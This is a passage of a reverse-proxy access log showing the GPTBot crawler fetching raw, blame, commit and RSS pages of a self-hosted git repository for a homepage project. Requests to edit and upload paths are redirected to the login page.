"/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/html/vite.config.ts" +[17/Feb/2026:15:11:01 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/html/vite.config.ts" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/html/vite.config.ts" +[17/Feb/2026:15:11:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/html/vite.config.ts" +[17/Feb/2026:15:11:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/components/Footer.tsx" [Client 74.7.227.38] [Length 3846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/Footer.tsx" +[17/Feb/2026:15:11:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/components/Footer.tsx" [Client 74.7.227.38] [Length 9779] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/Footer.tsx" +[17/Feb/2026:15:11:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/components/Header.tsx" [Client 74.7.227.38] [Length 9778] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/Header.tsx" +[17/Feb/2026:15:11:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14535] [Gzip 7.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/Footer.tsx" +[17/Feb/2026:15:11:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/html/components/Header.tsx" [Client 74.7.227.38] [Length 15258] [Gzip 7.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/Header.tsx" +[17/Feb/2026:15:11:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/components/Contact.tsx" [Client 74.7.227.38] [Length 6703] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/Contact.tsx" +[17/Feb/2026:15:11:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/types.ts" [Client 74.7.227.38] [Length 302] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/types.ts" +[17/Feb/2026:15:11:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/types.ts" [Client 74.7.227.38] [Length 802] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/types.ts" +[17/Feb/2026:15:11:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/vite.config.ts" [Client 74.7.227.38] [Length 580] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/vite.config.ts" +[17/Feb/2026:15:11:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/vite.config.ts" [Client 74.7.227.38] [Length 814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/vite.config.ts" +[17/Feb/2026:15:11:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/html/components/Contact.tsx" [Client 74.7.227.38] [Length 17211] [Gzip 8.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/Contact.tsx" +[17/Feb/2026:15:11:07 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/html/assets/js" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/js" +[17/Feb/2026:15:11:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/html/assets/js" +[17/Feb/2026:15:11:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/types.ts" [Client 74.7.227.38] [Length 9773] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/types.ts" +[17/Feb/2026:15:11:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/components" [Client 74.7.227.38] [Length 9772] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components" +[17/Feb/2026:15:11:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/package.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/package.json" +[17/Feb/2026:15:11:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/package.json" +[17/Feb/2026:15:11:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/.gitignore" [Client 74.7.227.38] [Length 9767] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/.gitignore" +[17/Feb/2026:15:11:10 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/html/assets/images" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images" +[17/Feb/2026:15:11:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/html/assets/images" +[17/Feb/2026:15:11:10 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_upload/main/html/assets/images" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images" +[17/Feb/2026:15:11:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_upload/main/html/assets/images" +[17/Feb/2026:15:11:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/html/.gitignore" [Client 74.7.227.38] [Length 10988] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/.gitignore" +[17/Feb/2026:15:11:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/.gitignore" [Client 74.7.227.38] [Length 253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/.gitignore" +[17/Feb/2026:15:11:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/.gitignore" [Client 74.7.227.38] [Length 806] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/.gitignore" +[17/Feb/2026:15:11:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/services" [Client 74.7.227.38] [Length 9776] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/services" +[17/Feb/2026:15:11:13 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/html/assets/images" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images" +[17/Feb/2026:15:11:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/html/assets/images" +[17/Feb/2026:15:11:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/assets" [Client 74.7.227.38] [Length 11142] [Gzip 4.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets" +[17/Feb/2026:15:11:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/components/About.tsx" [Client 74.7.227.38] [Length 14168] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components" +[17/Feb/2026:15:11:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15775] [Gzip 4.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components" +[17/Feb/2026:15:11:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/components/Services.tsx" [Client 74.7.227.38] [Length 14866] [Gzip 4.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components" +[17/Feb/2026:15:11:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/tsconfig.json" [Client 74.7.227.38] [Length 9767] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/tsconfig.json" +[17/Feb/2026:15:11:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/services/geminiService.ts" [Client 74.7.227.38] [Length 13368] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/services" +[17/Feb/2026:15:11:17 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/html/.gitignore" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/html/.gitignore" +[17/Feb/2026:15:11:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/html/.gitignore" +[17/Feb/2026:15:11:17 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/html/.gitignore" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/html/.gitignore" +[17/Feb/2026:15:11:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/html/.gitignore" +[17/Feb/2026:15:11:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/html/package.json" [Client 74.7.227.38] [Length 11219] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/package.json" +[17/Feb/2026:15:11:19 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/html/assets" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets" +[17/Feb/2026:15:11:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/html/assets" +[17/Feb/2026:15:11:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/package.json" [Client 74.7.227.38] [Length 496] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/package.json" +[17/Feb/2026:15:11:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/package.json" [Client 74.7.227.38] [Length 810] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/package.json" +[17/Feb/2026:15:11:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/components/About.tsx" [Client 74.7.227.38] [Length 826] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/About.tsx" +[17/Feb/2026:15:11:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/components/About.tsx" [Client 74.7.227.38] [Length 9778] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/About.tsx" +[17/Feb/2026:15:11:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/components/Services.tsx" [Client 74.7.227.38] [Length 9781] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/Services.tsx" +[17/Feb/2026:15:11:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 9780] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/ChatBot.tsx" +[17/Feb/2026:15:11:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/services/geminiService.ts" [Client 74.7.227.38] [Length 9788] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/services/geminiService.ts" +[17/Feb/2026:15:11:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/html/services/geminiService.ts" [Client 74.7.227.38] [Length 13190] [Gzip 4.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/services/geminiService.ts" +[17/Feb/2026:15:11:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/services/geminiService.ts" [Client 74.7.227.38] [Length 1787] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/services/geminiService.ts" +[17/Feb/2026:15:11:24 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/html/package.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/html/package.json" +[17/Feb/2026:15:11:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/html/package.json" +[17/Feb/2026:15:11:24 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/html/package.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/html/package.json" +[17/Feb/2026:15:11:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/html/package.json" +[17/Feb/2026:15:11:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/html/components/About.tsx" [Client 74.7.227.38] [Length 14057] [Gzip 5.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/About.tsx" +[17/Feb/2026:15:11:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 4368] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/ChatBot.tsx" +[17/Feb/2026:15:11:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 830] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/ChatBot.tsx" +[17/Feb/2026:15:11:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/components/Services.tsx" [Client 74.7.227.38] [Length 3708] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/Services.tsx" +[17/Feb/2026:15:11:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/components/Services.tsx" [Client 74.7.227.38] [Length 832] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/Services.tsx" +[17/Feb/2026:15:11:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/html/components/Services.tsx" [Client 74.7.227.38] [Length 14846] [Gzip 6.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/Services.tsx" +[17/Feb/2026:15:11:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 16174] [Gzip 7.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/ChatBot.tsx" +[17/Feb/2026:15:11:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/services/geminiService.ts" [Client 74.7.227.38] [Length 836] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/services/geminiService.ts" +[17/Feb/2026:15:11:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/tsconfig.json" [Client 74.7.227.38] [Length 812] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/tsconfig.json" +[17/Feb/2026:15:11:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/tsconfig.json" [Client 74.7.227.38] [Length 542] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/tsconfig.json" +[17/Feb/2026:15:11:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/status.json" [Client 74.7.227.38] [Length 11285] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html" +[17/Feb/2026:15:11:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/package.json" [Client 74.7.227.38] [Length 9765] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/package.json" +[17/Feb/2026:15:11:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/html/tsconfig.json" [Client 74.7.227.38] [Length 11410] [Gzip 4.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 